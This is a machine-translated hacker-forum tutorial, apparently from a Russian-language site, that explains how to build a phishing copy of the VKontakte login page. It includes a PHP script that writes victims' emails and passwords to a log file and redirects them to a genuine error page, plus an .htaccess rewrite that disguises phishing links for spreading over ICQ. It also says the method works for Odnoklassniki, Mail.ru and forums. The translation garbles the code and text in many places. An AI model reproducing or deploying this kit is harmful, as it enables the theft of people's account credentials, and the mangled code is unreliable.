This page has been robot translated, sorry for typos if any. Original content here.

In Eile gefälscht

[iNtrO]

Es gab nichts zu tun, es war am Abend .... Eigentlich wurde mein erster Artikel (der erste im Anti-Chat) durch die Tatsache nach unten gezogen, dass es in der Buy / Sell / Exchange / Roll-Sektion für Groß ein Thema gibt, bei dem man hecker soviel Fälschungen verkauft 10 VMZ, und oft gebeten, die eine oder andere Fälschung zu erstellen ...
Ich werde Ihnen in einem Artikel erklären, wie man eine universelle Fälschung fast unter allem, was ugone bekommt! Ich werde am Beispiel der gefälschten vkontakte zeigen.

[SeaRchING]

Als Erstes müssen wir eine Ressource für das Opfer auswählen und alle benötigten Informationen sammeln, und wir benötigen nur eine Kopie einiger Seiten. Wir gehen über Operu (!) Zu vkontakte.ru . Wir drücken den Eingabeknopf, gehen zu login.php und nehmen ihn als unseren gefälschten Index. Wir drücken in der Oper: Datei -> Speichern unter -> Im geöffneten Dialog wählen wir unter dem Namen (standardmäßig gibt es Webarchiv ....) " HTML- Datei mit Bildern " aus und schreiben in die Spalte Dateiname Index (oder login.htm) - je nach Seite)


Als nächstes geben Sie dort unrealistische Daten ein und gelangen zu der Seite, auf der sie geschrieben sind
Diese E-Mail-Adresse ist nicht registriert oder das Passwort ist falsch.
Wir halten es genauso, also schreiben wir anstatt Index schlecht .
Als nächstes fahren wir in der Phrase Vkontakte.ru auf Google.ru, klicken auf die zusätzlichen Ergebnisse von vkontakte.ru und suchen nach etwas im Zusammenhang mit dem Kontakt eror ... Auf der zweiten Seite fand ich VKontakte | Fehler (http://vkontakte.ru/blank.php?code=10)- Denken Sie daran, wir brauchen diesen Link
Verwenden Sie alles, was wir für die Fälschung von der Ressource benötigen, die wir bereits haben.

[CoDiNg]

Tax, jetzt untersuchen wir das Login-Formular. Öffnen Sie unsere index.html und suchen Sie nach dem Anmeldeformular.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "grey"> E-Mail: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "grey"> Passwort: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "Rand oben: 1 Pixel; Vertikal ausrichten: Mitte;"  type = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Ausländischer Computer </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
Von hier aus erinnern wir uns an 3 Dinge:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = " pass " value = "" id = "pass" size = "25" />
In diesen drei Dingen ist der erste Teil der Eindeutigkeit enthalten, in jedem sozialen Netzwerk, in jeder E-Mail oder an jedem anderen Ort, an dem sich das Eingabeformular (Felder) in dieser Ansicht befindet (also nur der Name der Felder wird aktiviert).
<input id = "field_password" value = "" style = "width: 170px;" type = "password" size = "20" name = " st.password ">
Dh der Name der Felder ist einfach anders;
Jetzt erstellen wir eine PHP-Datei und nennen sie zum Beispiel login.php , ihren Inhalt:

PHP Code:
  <? php
 

/ *
##############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ ((( 0 0a-z- ++ ..) + [0a-za2.0,42)) i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'password' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'password' ]. "\ n" );
header ( "Location: http: //" );
} else {
header ( "Location: http: //" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Eigentlich schauen wir uns das Skript an, ein paar Schriftrollen, aber das ist eine ganz normale Fälschung, seine Funktionalität:
Speichern übertragener Variablen, deren Verifikation, Weiterleitung je nach Verifikation.

Und so, jetzt zurück zu diesen 3 Zeilen:
<form method = "post" name = "login" id = "login" action = " login.php ">
Hier haben wir alles in Ordnung. Der Name unseres Skripts stimmt mit dem Namen des Skripts überein, stimmt aber nicht überein. Dann ersetzen wir es oder benennen es um.
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
Ab hier brauchen wir name = " email " und name = " pass "
Fügen Sie sie an der richtigen Stelle in unser Skript ein.
  <? php
 

/ *
##############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ ((( 0 0a-z- ++ ..) + [0a-za2.0,42)) i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
header ( "Location: http: //" );
} else {
header ( "Location: http: //" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Wer es nicht bemerkt hat, ist $ _POST ['email'] und $ _POST ['pass']

Als nächstes schauen wir uns das Knarren an, hier wird die IF ELSE-Funktion gesetzt und pregmatch, dh wenn das E-Mail-Feld der E-Mail entspricht (nick@mylo.ru und nicht wie angesteuert) und das Passwortfeld nicht leer ist, wird die erste Weiterleitung ausgeführt, wenn die E-Mail nicht übereinstimmt oder Das Pass-Feld ist leer, dann die zweite Umleitung. Daraus folgt, dass, wenn Chel Seife und etwas Ähnliches wie einen Pass eingeführt hat, wir ihn auf die Seite mit dem Fehler http://vkontakte.ru/blank.php?code=10 werfen und wenn er Müll eingegeben hat (hier haben wir gebraucht) Kopie der Seite bad.html? Wenn wir falsche Daten eingegeben haben), dann werfen wir sie zurück, das heißt, wir geben bad.htm ein.

PHP Code:
  <? php
 

/ *
##############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri +) @ ((( 0 0a-z- ++ ..) + [0a-za2.0,42)) i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
header ( "Ort: http://vkontakte.ru/blank.php?code=10" );
} else {
header ( "Location: bad.htm" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Wir speichern. Wir füllen den ganzen Mist auf dem Server aus (login.php, index.htm + Ordner mit Dateien, bad.htm + Ordner mit Dateien), erstellen die Datei log.txt (ich rate Ihnen, sich Ihren eindeutigen Namen auszudenken . Vergessen Sie nicht, das Skript zu ändern), stellen Sie ihn auf ihn chmod777.

3) ein kleines Update ...

Dieses Update ist sehr gut für SI geeignet. Im Stammverzeichnis des FTP erstellen wir eine .htaccess- Datei mit folgendem Inhalt:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ACHTUNG !!!
! index \ .htm - Beziehen Sie sich auf diese Dateiumleitung. Wenn Sie eine Fälschung haben, sagen wir login.html. Dann müssen Sie den Index dem Login entsprechend umbenennen.

Steuern, diese Datei gibt uns einen Link mehr qualitative Gazliv, nämlich:
Ihr fak.ru / jeder Text, um die Linkstruktur der sogda Fälschung zu kennen, zum Beispiel ein Kontakt, wir können dies tun:


Ihre fiction.ru / photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
und vparit es auf ICQ))) zustimmen. weniger auffällig jetzt fake))

Das ist alles

[Der eND] Eigentlich ist das Einzigartige, und die Tatsache, dass Sie zu Klassenkameraden gehen können, speichern Sie auch die Seite, geben Sie Variablen ein, ersetzen Sie URLs (ich gebe sofort http://odnoklassniki.ru/dk?st.cmd=error) und das wars, absolut Gehen Sie zu Mayil.ru, speichern Sie die Variablen und ersetzen Sie und alles))) Das einzige, was Sie möglicherweise brauchen, ist Kreativität, wir speichern nicht die Hauptseite, sondern die Anmeldeseite. Sie können auch jedes Forum erstellen, wenn Sie einen Account erhalten möchten ( schicke an pm
<a href="feik"> Link zum Thema </a>
, und in Fake geben Sie dieses Thema zur Weiterleitung an.